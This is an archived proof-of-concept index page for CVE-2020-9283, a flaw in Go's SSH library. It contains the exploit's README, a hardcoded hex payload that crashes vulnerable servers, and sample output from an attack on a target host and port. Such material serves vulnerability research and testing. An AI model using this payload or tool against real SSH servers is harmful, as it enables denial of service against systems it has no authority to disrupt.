CVE-2020-9283 PoC — Golang Go crypto 数据伪造问题漏洞

Source

https://github.com/brompwnie/CVE-2020-9283

Associated Vulnerability

Title:Golang Go crypto 数据伪造问题漏洞 (CVE-2020-9283)
Description:Golang Go crypto是Golang社区的一款基于 Go 语言的加密代码库。 Golang SSH Package v0.0.0-20200220183623-bac4c82f6975之前版本（Go）中存在数据伪造问题漏洞。攻击者可利用该漏洞导致拒绝服务。

Description

Exploit for CVE-2020-9283 based on Go

Readme

# Exploit for CVE-2020-9283  

This project is inspired by the original POC found here github.com/mark-adams/exploits/CVE-2020-9283.
I was curious as to how the Go SSH library was implemented so decided to implement the PoC using go.

A short writeup can be found here https://dev.to/brompwnie/modifying-go-s-crypto-ssh-library-for-cve-2020-9283-26a7

# What does this do?

This invokes a panic on a Go based SSH server which may lead to a DoS. 

# Installation

I've released binaries in the Release section however you can rebuild your own using the source code attached.

## Building the sources
I decided to modify the Go crypto library directly on my system to understand how it works, this is not ideal and probably not the best way to do this but it works ;) If you want to rebuild using GO modules, replace the contents of the Crypto/ssh files client_auth.go, handshake.go, transport.go on your local system with the ".bak" files located here. These modified files contain verbose debugging output and a hardcoded payload of "0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161" which triggers the panic.

# Usage
You will see lots of debugging output and "errors", this is expected. If your target has panic'd, you should see errors associated to "bad key lengths". If you want to test this locally, use the vulnerable code that can be found here github.com/mark-adams/exploits/CVE-2020-9283

```
# ./CVE-2020-9283 -h
Usage of ./CVE-2020-9283:
  -host string
        IP address of SSH host to target (default "localhost")
  -key string
        ssh-ed25519 private key to use (default "thekey")
  -port string
        Port to target (default "22")

# ./CVE-2020-9283 -port=2022
./CVE-2020-9283 -port=2022
+] Sploit for CVE-2020-9283
[+] Attempting to pwn: localhost:2022
[!] Attempting: cMSG_USERAUTH_REQUEST
[+] userAuthRequestMsg User:  notme
[+] userAuthRequestMsg Service:  ssh-connection
[ERROR] ssh: handshake failed: EOF
[+] This should have invoked a panic on the SSH target i.e 'panic: ed25519: bad public key length'

```

File Snapshot


 [4.0K]  /data/pocs/0a3142ae02d3b8a652d8b087e9e865f96738d61b
├── [ 20K]  client_auth.go.bak
├── [8.7K]  client.go.bak
├── [ 115]  go.mod
├── [ 824]  go.sum
├── [ 16K]  handshake.go.bak
├── [1.7K]  main.go
├── [1.5K]  Makefile
├── [2.0K]  README.md
└── [9.3K]  transport.go.bak

0 directories, 9 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!